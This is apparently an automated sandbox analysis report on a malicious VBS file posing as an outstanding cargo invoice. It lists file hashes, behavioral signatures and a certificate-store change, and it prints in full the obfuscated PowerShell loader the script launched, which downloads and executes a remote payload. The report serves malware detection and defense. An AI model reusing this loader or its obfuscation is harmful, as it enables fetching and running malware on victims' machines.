Analysis
-
max time kernel
299s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-11-2024 06:11
Static task
static1
Behavioral task
behavioral1
Sample
CargoInvoice_Outstanding_56789_2024-11-21.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
CargoInvoice_Outstanding_56789_2024-11-21.vbs
Resource
win10v2004-20241007-en
General
-
Target
CargoInvoice_Outstanding_56789_2024-11-21.vbs
-
Size
38KB
-
MD5
e221e50773f32bab23fcf3d130c68481
-
SHA1
350bd0a28a1cbffb8a9e4f9075cec81895798a80
-
SHA256
602003e98421ce67063784195fd50caa107f895549f55efc60bf569e605f61f2
-
SHA512
6c846e5b6a6c835511cfb7823516163ba9f1056e7ac2159e73a059b29bfc75b102c43f8779330a220fbffcaf0708e5c47aa6a5947beb983d1fa954fbe337de3e
-
SSDEEP
768:IZLtB89wlVgpDAus1yZUR/eGR4/3yLohsVgIij/+gHxWseNAeonfre7st2r:IZJB8rDds1yGRm+4/kLiD+goRNAnXtu
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
WScript.exeflow pid process 3 3020 WScript.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
WScript.exedescription ioc process File opened (read-only) \??\Z: WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Processes:
WScript.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 WScript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 WScript.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1688 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1688 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 3020 wrote to memory of 1688 3020 WScript.exe powershell.exe PID 3020 wrote to memory of 1688 3020 WScript.exe powershell.exe PID 3020 wrote to memory of 1688 3020 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CargoInvoice_Outstanding_56789_2024-11-21.vbs"1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Predenying Kloakeringsarbejde Chambrierers Urbaniteten persongruppers Alhandal #><#Telegrafvsnets Metallurgy sundari Kvlning Bleachyard Charlataneriet #>$Omringede='Kommandoaktions';function Cypseliform($Foretagendes){If ($host.DebuggerEnabled) {$Ureteropyelitis=3} for ($Arther85=$Ureteropyelitis;;$Arther85+=4){if(!$Foretagendes[$Arther85]) { break }$Dewaters+=$Foretagendes[$Arther85]}$Dewaters}function Pattede($Overanstrengelses){ .($Histography) ($Overanstrengelses)}$serievarerne=Cypseliform ' UsN Afe .htLgm.OnowCl,e BoBPlecsitLAkkIFo etwin oct';$sprogforskernes=Cypseliform ',mpMFoloCanz seiEl lelels gaNat/';$Metabolisme=Cypseliform 'Di TNatlknasTr,1Teg2';$Damaskduge36='Tel[Conn kuEPaaTTi,.dumsNunEsp.rPrevdelIUnmCGamENaupKatoFori .rNCirt iMranA enNBenAsprGante GrRAnd] Br:s,a:AntsDe ERavClg.UF rrUnmIRobtvanYAntpUkarE ro RetFlhoOveC hio Fil,it=Ana$.rgMT,ueI fT stARe,bGlio,haLD ciFixsEn,MFave';$sprogforskernes+=Cypseliform 'spe5Aho. Pn0 B. r(UneWPeriPlanWeed ,ioGalwB,ns n AntNZygT T sul1Ove0 .u. r0 Wh;Gip AadWGamiUmrn sa6Be,4Cha;saz Fesxsr 6 Na4Uds;sta Ignr s vkon: Bo1.ef3Fr 1 E .Til0Mel) fu D,pGsl eBlocDeskN tosko/ tr2ski0 Di1 el0 oo0bro1Gaa0str1Fil Ty FJavitrarForeFarfNago EkxU s/N t1say3ski1 Ac.Pas0';$Roomies=Cypseliform ' s UK ms ReePinRMul-NitaUnpgTndeP.an ot';$spyttekummerne=Cypseliform 'DrahR stCints mpF rs re:Hjt/Fej/ForbNa 9tilaTa,1sub..asiY gcTriu rs/UndXL br KoCChaG beXFo.V esfKabsHol/selTMinr isuOkas PitslulFnoeKli2 Ge0Rec.c.eaE tssubd';$supercanonical=Cypseliform ' ,v>';$Histography=Cypseliform 'stai KbeProX';$saliences109='Perfiditet';$fabaceae='\Afprikningen.Bss';Pattede (Cypseliform 'h i$GoigConL hoOPanBMisAParLLen:AfbEdriKDras toasteMs.eELacnT lsU dssu T s.T ,oEleiTpro= l$LigE H,NHerVP l: seA ,aPP ePNasDDraaIntt,ibA e+Des$RacfordaswiBW naEbuCHypEMolALege');Pattede (Cypseliform 'Ano$sc,GU gl,adospebaktaUdllU d:Da,bRe.uBrynunpITrinCoogB,iE airNatNFlaEUnhsPar=Cub$Af sYeoPFriYu at sTB geKn KUncuLurm BuMGloETrarDi n HuEt i.Fifs InPBanL.ili AnTRes( Ja$ lasZomUMyrP skEPenrArtCEvaa C nrevoskln Cri ykCDraA MeLBil)');Pattede (Cypseliform $Damaskduge36);$spyttekummerne=$Buningernes[0];$Antagonization130=(Cypseliform 'Pos$BaggA ilBreOUnvbAlbasclLsyk:si.a M tTo CPr =sumNsulECarWCy,-ZebOconb ajPh E JaCshat Ra Pers suy rmsBe tM,keUp mBor.Dep$Unas pleEndr fvIRetE.rnVRabAOplR V.E ncRAntnsjle');Pattede ($Antagonization130);Pattede (Cypseliform 'ges$ ,yAs atColcfor.DagHspreTa,a ord rieTo rBris e[Lan$ BiR,ytoOveoK.gm AliRe eudlsIct]Oof=Adm$T ps iprearClaoAwfgswaf FjoOrdrsphsDdmkR,neIndrPhynT reCo.s');$Civicism=Cypseliform ' s $BlrAEsttsupc ik.,irD,eaoPi wFr nLarlAnaodiaaBold.ecFHaviImml C es,e(Fri$Fors Uppsp.yThotOdyt eeGibkCleu fsmLasm MeevirrCrinVeneR g,a l$DisK stoM rk re ,yt P t R e BlrMaje Fot k )';$Koketteret=$Eksamenssttet;Pattede (Cypseliform 'Udd$.rugAlvlOblosasBDevACluLLi :Elav nivokrseru ulA aeDeiN slsVile Bun,ph=Lok(F.uT V e ResDu Tspl-Begp LiABestU phTil Bi.$RehK Vao GekskresavTEcttMi e BlRstjE aTC,r)');while (!$Virulensen) {Pattede (Cypseliform 'Reb$UnsgUnflBgeo arbMyoaimpl Fo: pak BluD wnMims M t.ipfDecoF ir ursUnetRumaNednClidFla=Fje$ GuU rok UneMesnsged .weMajlMe iDu gLashUnaePand') ;Pattede $Civicism;Pattede (Cypseliform 'C,ts LoTCenAGa R .uTImp-F rs Mol MiEUnpEkaePBol M.o4');Pattede (Cypseliform 'Lin$samg ChLsprO ab BuAK,nLdis:ReuVMrkiBehRB.fu Del Unesn.nbrys oe rNEry=.or(Pr tUnee ersFreT Kv-stapma aud,TEl.hP r ,fv$R cK oroBeeKskbekulTspotM re dR.ule sptDyr)') ;Pattede (Cypseliform 'Pyr$AlcG stl oOsi BEx asamls,r:UnstafbiD uO V lFulOUr gGyniCloEB,sn Bes Co=Co,$H.rGBoll Tiose b seAPool hr:.dbm C,e KoTMelastiGHy ABals tjTh eECe.rCon+Es +Adn% .o$LigB auAsyNP oI sknNdrgNipEGrerM,snBureC,rs or. N cHano irUrowN .lt') ;$spyttekummerne=$Buningernes[$Tiologiens]}$straighted=312945;$sprngbombes=29375;Pattede (Cypseliform ' G $HerGturl RtoVi B DrA LelT,i:HvnmBruAChiCBasrDeboTasCPenEshiP ndHAleADamlV dO PauP esRe, En=Coa Kodg R ETiltPre-sk C ndOsubn ittErseBrnn I.Tskr Ben$R gK s oImpk roeAbsTKasT UdECapRb geForT');Pattede (Cypseliform 'Alv$slagKlul Fio subLy,aBagl il: ,oRH.reK.rssp,bgenoPoslU iiU,dgcivs Gy Rub= Fn Man[ nts E ysersV rt Beed,nmCir.OveCDisoillnR vv sheNedr omtDe.] ak:Reg: frFAmerAd oIchm DrB exaK tsNecesam6sem4Dens stVolrCo.i Tyn.atg .a(Kar$U eMProa nscDy,r muoJazcPere kp Kvh C.aMellPoko ulu ,lsBat)');Pattede (Cypseliform 'sp.$TrkGLe Lt,mOVirb D,aTilLFor:Hy bOrilF,raGredDolsKrymBe,RIndeJugRHyleErhssoc Hyp= na Rev[JausPl,ysk sPalt AbeRy.m Ca. s tTitEDomX amT Ar.ZareF,jN rCHinOR iDnatICh n Mig In]Ka :Tr : vraBefssagC K,IPerIAnt.RejgscoE ,ctM lsBortHa rChris mnselg Va( R $PlarskaeCh sPo,BUndoA llOpsisp.GDy.sLex)');Pattede (Cypseliform 'Ru $Gragd.ml cpORefbU raDisLYur: gesRo,P UdgL dE,igsEt =spa$DolbUngltaca U dAf sPapM KvrskoEs mR.one Bas M .Tousgrau RhBI,ys AntBesr F IGo nQuogs.l(Cho$Vars betGlarsnuaDraIsw,gUayHMustRygE ,eDUdh,Unc$ K.s ecpAg.R E n egg FoB AlOVigmcrebetee Grs ag)');Pattede $spges;"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b